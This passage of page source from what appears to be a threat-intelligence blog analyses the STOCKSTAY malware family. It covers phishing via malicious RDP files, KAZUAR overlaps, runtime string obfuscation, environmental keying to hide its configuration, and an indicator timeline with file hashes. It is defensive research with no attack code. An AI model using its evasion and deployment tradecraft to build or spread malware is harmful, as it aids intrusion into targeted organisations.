&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wdata&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Message data from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;container.message&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;coords&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Sender's IP address, extracted from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;X-Forwarded-For&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; header, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;none_ip&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; if no sender specified.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;status&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defaults to 0 - doesn't appear to be used or returned to the client.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;datetime&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Time of row creation&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 3: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;weather_data&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table structure&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Column&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;id&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Primary key&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;data&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Log message&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;datetime&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Time of creation&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 4: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; database table structure&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Key Operational Characteristics&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Consistent Use of Academic or Diplomatic Lure Content&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;compromising an email account belonging to a Ukrainian university to disseminate phishing emails;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;using the names of an academic institution within the file name of a malicious RDP file;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;compromising a diplomatic education platform for phishing and distribution of malicious RDP files;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;using “education” and “diplo” within registered phishing domains; and&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;using “DiplomacyEduAI” as the product name within STOCKSTAY MSI files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Persistent Ukrainian Targeting&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A significant proportion of STOCKSTAY operations observed by GTIG have been targeted at Government or Military organizations within Ukraine, consistent with Russian interests in relation to the ongoing conflict between the two countries. The threat actor has been observed utilizing in-country compromised infrastructure, including compromised government services, to deploy both STOCKSTAY and a range of supplementary payloads, in support of these operations. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Suspected European Targeting&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A smaller number of STOCKSTAY operations observed by GTIG appear to have been targeted at European entities. Early development samples of STOCKSTAY were identified in various European nations, including Italy, the Netherlands, Poland, and Germany; however, we have been largely unable to confirm the intended victims for the majority of these early infections, nor whether these samples were identified as a result of the threat actor testing their capabilities against publicly available virus scanning services such as VirusTotal. GTIG was able to identify, in at least one case, the targeting of entities associated with, or interested in, a foreign affairs ministry in Europe in relation to phishing and suspected STOCKSTAY activity. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Deployment via Malicious RDP Files&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG observed STOCKSTAY being deployed following successful phishing attempts using malicious RDP configuration files. The RDP files were designed to create a connection from the victim’s device to actor-controlled infrastructure, through which the actor could then deploy subsequent payloads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In one operation in early 2025, GTIG identified a phishing email, claiming to be sent by a defense-related training academy, containing a malicious RDP file attachment. A short time following the victim’s connection to the actor’s infrastructure, the actor deployed STOCKSTAY.MARKETMAKER, a .NET downloader designed to retrieve and install the full STOCKSTAY suite on the victim’s device. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Later, in mid-2025, GTIG identified similar malicious RDP files being hosted on a compromised diplomatic-themed education platform, luring victims into downloading and executing the file under the guise of enabling access to an online training portal. GTIG was unable to confirm whether STOCKSTAY was ultimately deployed as a result of this operation; however, overlaps in the actor’s infrastructure and education-themed lures for both operations may suggest STOCKSTAY was the intended payload. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Deployments at Multiple Stages of Operations&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through GTIG’s visibility, we have identified that the threat actor uses STOCKSTAY at multiple distinct stages of their operations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the first instance, the threat actor uses STOCKSTAY during operations to gain initial access into environments which haven’t yet been subject to the group’s reconnaissance activities. In these instances, STOCKSTAY is configured with hard-coded configuration passwords, which can be trivially extracted by analysts. We observed this type of infection stemming from the group’s phishing operations, where the threat actor is unable to determine exactly where in the victim’s network they are going to gain their initial foothold.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When the threat actor deploys STOCKSTAY at a later stage of operation, following reconnaissance, STOCKSTAY is configured to incorporate environmental keying for its configuration, requiring the malware to be executed either on a specific host, by a specific user, within a specific domain, or a pre-determined combination of the these attributes. This configuration implies that, at this stage, the actor knows exactly which machine is being targeted, likely through existing accesses to the target environment. This was seen within Ukrainian networks where STOCKSTAY was deployed toward the end of an operation which had previously relied heavily on the group’s other tools, such as KAZUAR. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Overlaps with KAZUAR&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;K1MORPHER String Obfuscation&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In April 2025, GTIG observed STOCKSTAY being updated to implement a new string obfuscation mechanism, based around an obscure pseudo-random number generation algorithm named “Squirrel3”, which was &lt;/span&gt;&lt;a href="https://www.gdcvault.com/play/1024365/Math-for-Game-Programmers-Noise" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;presented&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; at Game Developers Conference 2017. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG later identified versions of STOCKSTAY containing some of their original class-names, which showed the code responsible for runtime string deobfuscation being contained within a class named “K1.Morpher”. Analysis of K1MORPHER shows the ability to perform runtime deobfuscation of a range of datatypes, such as strings, integers, and arrays. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In June 2025 GTIG noticed K1MORPHER code appearing in samples of KAZUAR. KAZUAR has historically used its own simple but effective code and string obfuscation techniques to evade detection, such as: the insertion of junk code; replacing static constant values with the results of XOR operations; and large quantities of unique character substitution tables. The actor’s use of K1MORPHER within STOCKSTAY appears to be trending toward mimicking KAZUAR’s multi-class obfuscation techniques, where obfuscation is handled by multiple distinct classes, as observed in suspected test builds of STOCKSTAY hosted on a compromised Cypriot website in April 2024.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Implant Architecture&lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Since at least 2024, KAZUAR has been observed being deployed using a multi-component architecture, whereby C2 communication, task orchestration, and task execution are managed by separate components. Within the KAZUAR ecosystem, these components are referred to as “BRIDGE”, “KERNEL”, and “WORKER”, respectively.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As of late 2023, GTIG identified a similar separation of responsibilities within the STOCKSTAY ecosystem, with the same responsibilities being separated into distinct components. C2 communication is managed by the component tracked by GTIG as STOCKSTAY.STOCKBROKER, while task orchestration and execution are handled by STOCKSTAY.STOCKMARKET and STOCKSTAY.STOCKTRADER, respectively.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Environmental Keying&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both KAZUAR and STOCKSTAY ecosystems have been observed using environmental keying to protect themselves from detection and analysis.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;DIAMONDBACK, a dropper often deployed prior to KAZUAR in the execution chain, has made use of a hash of the target’s hostname in decrypting its payload, to prevent divulgence of its intentions outside of the target environment. Later versions of DIAMONDBACK can be configured to incorporate the target’s username and domain name in the hash required to decrypt the payload.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY has been observed using the hash of the target’s hostname or domain name during the decryption of its configuration data, preventing disclosure of C2 infrastructure unless operating in the intended environment.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Summary of Overlaps&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG assesses with moderate confidence that STOCKSTAY and KAZUAR may be developed in-part by a common developer or team, with active development occurring in tandem between the two malware ecosystems. We believe that STOCKSTAY is being developed in KAZUAR’s image, with several design decisions likely spawning from the threat actor’s wealth of experience in conducting operations using this long-standing toolkit. Both ecosystems rely heavily on .NET development, and have been observed using compromised WordPress sites during various stages of their operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We assess with low confidence that our observations of STOCKSTAY being deployed alongside KAZUAR during active operations may be a result of the threat actor seeking to test new capabilities in active operations, particularly where they may be expecting their existing access to be remediated in the near future. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY Timeline&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG has conducted a thorough investigation into the history of STOCKSTAY, identifying suspected development activity as far back as December 2022. What follows is our assessment of the timeline of events surrounding STOCKSTAY’s development and deployment. To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) within each observed operation section, and in a &lt;/span&gt;&lt;a href="https://www.virustotal.com/gui/collection/ed88a43801b5c58b9be27fa74abaa278a48904f3cc1bc905f2d85e32448b96c5/iocs" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GTI Collection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for registered users.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Timeline of STOCKSTAY observations" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig5.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 5: Timeline of STOCKSTAY observations&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;December 2022&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The version of the open-source websocket-sharp.dll bundled with the majority of observed STOCKSTAY.STOCKBROKER samples was last modified, according to timestamp information in MSI files and ZIP archives containing STOCKSTAY. Although built from an open-source library, this specific instance appears to have been compiled by the actor themselves, thus creating a uniquely identifiable artifact with which to track this malware’s continuous development.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;websocket-sharp.dll&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instance of open-source library used by the threat actor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d1e54270433a94aa3d45d888e4c62299bee3480eb2cb4a5489c7dda69d476c3e&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 5: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;September 21, 2023: Germany&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An early version of STOCKSTAY was uploaded to VirusTotal from Germany, under the filename “DriversPrinterGraphic.rar”. From the archive’s timestamps, it appears as though the sample was submitted within 20 minutes of being created, likely indicating this was submitted by the malware’s developer.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This version predates the malware’s separation into distinct role-based components, instead incorporating all core functionality into a single executable: StockMarketNews.exe. Additionally, this version of STOCKSTAY contained the user interface shown in Figure 6, which enables viewing/editing of configuration options and command messages, while still presenting as a stock market utility.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Early STOCKSTAY user-interface" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig6.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 6: Early STOCKSTAY user-interface&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This particular STOCKSTAY sample uses a slightly different configuration file format; however, the underlying configuration options are consistent with later versions. This sample also utilizes environmental keying for its configuration file; using the lower-cased hostname of the intended target as the decryption password. GTIG has been unable to recover the password at this time.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;DriversPrinterGraphic.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing STOCKSTAY&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e6d8192960a89d5480868b94088cccdaa1560f9c8a0b0282ced2b7c1f72341b6&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketNews.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY combined executable&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;1fc23ec18a94a599a34c74ef5f49a1e27acd37a07d5846661702b5e7e81a6a24&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;sample.conf&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
